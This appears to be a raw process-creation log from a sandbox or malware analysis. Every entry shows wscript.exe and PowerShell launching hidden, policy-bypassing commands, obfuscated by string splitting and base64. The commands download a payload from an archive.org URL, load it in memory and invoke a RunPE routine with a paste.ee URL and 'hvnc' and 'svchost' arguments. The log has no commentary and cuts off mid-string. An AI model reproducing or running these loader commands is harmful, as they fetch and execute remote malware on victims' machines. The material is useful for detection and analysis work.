Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ